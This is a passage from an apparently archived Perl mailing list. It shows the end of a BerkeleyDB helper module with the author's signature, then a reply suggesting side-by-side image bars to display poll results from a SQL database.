   -Home= $_[0],
   );
   die Could not create env: $! .$BerkeleyDB::Error. \n if !$env;
   return $env;
 }
 
 sub open_db {
   my( $file, $Rhash, $env ) = @_;
   my $db_key = tie( %{$Rhash}, 'BerkeleyDB::Btree',
   -Flags=DB_CREATE,
   -Filename=$file,
   -Env=$env );
   die Can't open $file: $! .$BerkeleyDB::Error.\n if !$db_key;
   return $db_key;
 }
 
 1;
 
 
 Dan Wilga [EMAIL PROTECTED]
 Web Technology Specialist http://www.mtholyoke.edu
 Mount Holyoke CollegeTel: 413-538-3027
 South Hadley, MA  01075Seduced by the chocolate side of the Force
 

Re: Poll for my site

[Mark Bergeron]

You could run a small img though your while loop and have it place one next to the 
other (side by side) using your rowcount values. That would be one way.

or you could try it with a foreach() as well.

Mark

-Original Message-
From: GsuLinuX[EMAIL PROTECTED]
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Date: Tue Mar 19 09:11:38 PST 2002
Subject: Poll for my site

Hi again from Istanbul:) ,

I wanna make poll for some datas that we obtain from the users. For this, i know 
howto insert the datas to my sql database, make an average or something specific but 
how can i show the results as visual which has become very popular in web sites?

thanx

Derya


___
GO.com Mail
Get Your Free, Private E-mail at http://mail.go.com